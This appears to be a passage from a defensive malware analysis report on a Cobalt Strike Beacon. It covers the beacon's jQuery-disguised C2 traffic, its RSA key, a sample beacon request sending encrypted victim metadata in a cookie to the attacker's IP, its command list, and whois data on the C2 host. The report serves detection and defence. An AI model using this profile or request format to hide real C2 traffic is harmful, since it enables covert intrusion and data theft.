It is designed to use a JavaScript library jQuery malleable C2 profile for communication to evade detection. It attempts to send a GET request to its C2 server with metadata in the cookie header “__cfduid” that contains information about the compromised system such as, username, computer name, operating system (OS) version, the name of the malware executing on the victim’s system, and other information. The metadata in the cookie header is encrypted and encoded.

Displayed below is the RSA public key used to encrypt the metadata before it is encoded using NetBios (uppercase) and base64 encoding algorithm:

–Begin public key–
30 81 9F 30 0D 06 09 2A 86 48 86 F7 0D 01 01 01 05 00 03 81 8D 00 30 81 89 02 81 81 00 C0 A5 61 19 9F CB D8 1D 83 7F 26 25 E8 17 BD B1 1A 95 AE C5 D6 7B 80 64 58 9F A1 3B FA 61 66 B1 50 D2 CC 89 8B EC 64 CC 5E B9 65 07 84 CC EB FA 11 F9 60 CA 93 42 FE F1 E9 4B 7A 5E B7 15 73 D0 DD DD CA FE DD 7F F1 D9 D8 04 BA 63 3C 44 7E FC 6F E2 BB 6B E2 00 DF BA 28 4B 10 7C A0 37 3B A6 6F 00 18 3D FE E1 FC E8 6D 9E AE 8C 3B 22 4E 1A D9 58 A7 B9 C6 12 90 A2 7C 8D 85 75 C9 F7 83 CD 02 03 01 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
–End public key–

Displayed below is a sample jQuery Malleable C2 Hypertext Transfer Protocol (HTTP) GET request with metadata in the cookie header:

–Begin request–
GET /jquery-3.3.1.min.js HTTP/1.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Referer: http://code.jquery.com/
Accept-Encoding: gzip, deflate
Cookie: __cfduid=vZZ5M4aBtrWVoM5-rSVJFrF_ucMPaPE3QjFh6lc2jJ9YYlfZlI2k7M3PwRbOpG9HZXpYi7cauuFgY62ZfLQ9SvZF5anYnl0aQE6oR1Xi_D2fkuoNiug3oKXLk-Vj-Fwp1IhyNG4gKv0vzkU9Scy0EByFnaM2E-Prj__Bb1niJjw
User-Agent: Mozilla/4.1 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36
Host: 207[.]148[.]76[.]235
Connection: Keep-Alive
Cache-Control: no-cache
–End request–

Analysis indicates that the C2 server will respond to the above HTTP GET request with encrypted data that contains commands, which the malware will decrypt and execute to perform additional functions. The C2 server response payload was not available for analysis.

Displayed below are sample functions built into the malware:

–Begin commands–
Make and change directory
Copy, move, remove files to the specified destination
Download and upload files
List drives on victim’s system
Lists files in a folder
Enable system privileges
Kills the specified process
Show running processes
Binds the specified port on the victim’s system
Disconnect from a named pipe
Process injection
Service creation
–End commands–

Screenshots

Figure 2 - The screenshot of the shellcode embedded in the MZ header.

Figure 2 – The screenshot of the shellcode embedded in the MZ header.

207.148.76.235

Ports
Whois

Recent Passive DNS Resolutions
wordpress-499253-1580367.cloudwaysapps.com
207.148.76.235
kejhnaxoi.alosmart.in
207.148.76.235
chanlycuocsong.com
207.148.76.235
291bc2ac-bd67-11e9-bd1f-d89d67231d10.vuhongminh.com
207.148.76.235
update.vuhongminh.com
207.148.76.235

IP Location
   Country: Singapore
   Region: Central Singapore
   City: Singapore
   ISP: Sgp_vultr_cust

Whois Server
   whois.apnic.net

Whois Record
% Abuse contact for ‘207.148.64.0 – 207.148.79.255’ is ‘abuse@choopa.com’

inetnum:        207.148.64.0 – 207.148.79.255
netname:        SGP_VULTR_CUST
descr:         SGP_VULTR_CUST
country:        SG
admin-c:        CLA15-AP
tech-c:         CLA15-AP
abuse-c:        AC1765-AP
status:         ASSIGNED NON-PORTABLE
mnt-by:         MAINT-CHOOPALLC-AP
mnt-irt:        IRT-CHOOPALLC-AP
last-modified: 2021-02-09T13:52:42Z
source:         APNIC

irt:            IRT-CHOOPALLC-AP
address:        100 Matawan Rd, Matawan NJ 07747
e-mail:         abuse@choopa.com
abuse-mailbox: abuse@choopa.com
admin-c:        CLA15-AP
tech-c:         CLA15-AP
auth:         # Filtered
remarks:        abuse@choopa.com was validated on 2022-04-14
mnt-by:         MAINT-CHOOPALLC-AP
last-modified: 2022-04-14T13:11:20Z
source:         APNIC

role:         ABUSE CHOOPALLCAP
address:        100 Matawan Rd, Matawan NJ 07747
country:        ZZ
phone:         +000000000
e-mail:         abuse@choopa.com
admin-c:        CLA15-AP
tech-c:         CLA15-AP
nic-hdl:        AC1765-AP
remarks:        Generated from irt object IRT-CHOOPALLC-AP
remarks:        abuse@choopa.com was validated on 2022-04-14
abuse-mailbox: abuse@choopa.com
mnt-by:         APNIC-ABUSE
last-modified: 2022-04-14T13:12:10Z
source:         APNIC

role:         Choopa LLC administrator
address:        319 Clematis St. Suite 900
country:        US
phone:         +1-973-849-0500
fax-no:         +1-973-849-0500
e-mail:         abuse@vultr.com
admin-c:        CLA15-AP
tech-c:         CLA15-AP
nic-hdl:        CLA15-AP
mnt-by:         MAINT-CHOOPALLC-AP
last-modified: 2022-07-19T11:35:13Z
source:         APNIC

route:         207.148.64.0/20
origin:         AS20473
descr:         Choopa, LLC
               14 Cliffwood Ave
               Suite 300
mnt-by:         MAINT-CHOOPALLC-AP
last-modified: 2020-04-21T14:39:46Z
source:         APNIC

Relationships
207.148.76.235 Connected_From 3450d5a3c51711ae4a2bdb64a896d312ba638560aa00adb2fc1ebc34bee9369e
Description

The C2 domain configured in the Cobalt Strike Beacon.